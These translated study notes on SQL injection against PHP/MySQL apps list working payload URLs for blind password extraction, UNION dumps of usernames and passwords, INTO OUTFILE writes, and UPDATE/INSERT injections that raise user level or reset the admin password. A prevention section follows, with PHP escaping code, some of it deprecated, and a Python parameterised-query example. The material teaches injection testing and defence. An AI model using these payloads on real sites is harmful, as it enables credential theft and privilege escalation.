The focus of SQL injection is constructing SQL statements: only by using SQL flexibly can we construct effective injection strings. After studying the subject I wrote these notes so they are ready for use at any time. I assume you understand the basic principles of SQL when reading the following content. The code in the notes comes from the Internet.
===Basic part===
Same-table query:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
UNION statement:
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
Export file:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
The constructed homepage value is: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
UPDATE statement: I like this one. First understand this SQL statement:
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
If the values are modified in the following ways, injection is achieved:
1: modify the homepage value to
http://4ngel.net', userlevel='3
and then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
(userlevel is the user's privilege level)
2: Modify the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3: Modify the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
===Advanced part===
Commonly used MySQL built-in functions
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING()
MID()
char()
load_file()
...
Applying the functions:
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to 'angel' (decimal ASCII codes)
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
Determine the number and types of columns in the table:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)
Guess the table name:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
Cross-table query to get username and password:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
Others:
# Check the first character of the password
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
===Injection Prevention===
Server side:
magic_quotes_gpc set to On
display_errors set to Off
Escaping (the two str_replace calls escape the LIKE wildcards, which addslashes() does not touch):
$keywords = addslashes($keywords);
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);
Numeric type:
Wrap the parameter in intval()
String type:
Put single quotes around the parameters in the SQL statement
The following code is used to prevent injection:
if (get_magic_quotes_gpc()) {
    // input has already been backslash-escaped by PHP
} else {
    $str = mysql_real_escape_string($str);
}
// escape LIKE wildcards separately; the escaping above does not cover them
$keywords = str_replace("_","\_",$keywords);
$keywords = str_replace("%","\%",$keywords);
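The prevention advice above (quote the string parameters, escape LIKE wildcards, validate numeric parameters) is shown here as an added example, not code from the original notes. It is written in Python against an in-memory SQLite table rather than the PHP/MySQL code the notes use; the `user` table layout and rows are constructed to match the notes, and the `' OR '1'='1` input is the same kind of quote-breaking string the notes build.

```python
import sqlite3

# Constructed sample rows; columns mirror the `user` table used in the notes.
SAMPLE_USERS = [
    (1, "angel", "mypass", "http://4ngel.net", 1),
    (2, "admin", "s3cret", "", 3),
    (3, "angel_2", "other", "", 1),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid INTEGER, username TEXT, "
                 "password TEXT, homepage TEXT, userlevel INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?,?,?,?,?)", SAMPLE_USERS)
    return conn

def lookup_vulnerable(conn, username):
    # String concatenation: the value becomes part of the SQL text,
    # so a quote in the input rewrites the WHERE clause.
    sql = "SELECT username FROM user WHERE username='" + username + "' ORDER BY userid"
    return [r[0] for r in conn.execute(sql)]

def lookup_safe(conn, username):
    # Parameterised query: the driver sends the value separately from the
    # statement, so quotes inside it are only data.
    sql = "SELECT username FROM user WHERE username=? ORDER BY userid"
    return [r[0] for r in conn.execute(sql, (username,))]

def escape_like(term):
    # Parameters protect the quoting, but % and _ are still wildcards
    # inside LIKE; escape them as the notes' str_replace lines do.
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def search_safe(conn, prefix):
    # Prefix search: only the trailing % we append acts as a wildcard.
    pattern = escape_like(prefix) + "%"
    sql = "SELECT username FROM user WHERE username LIKE ? ESCAPE '\\' ORDER BY userid"
    return [r[0] for r in conn.execute(sql, (pattern,))]

def parse_id(raw):
    # Numeric parameter: like intval(), but reject instead of silently
    # coercing "1 and ..." to 1.  Returns None for anything not all digits.
    return int(raw) if raw.isdigit() else None
```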
Useful functions:
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()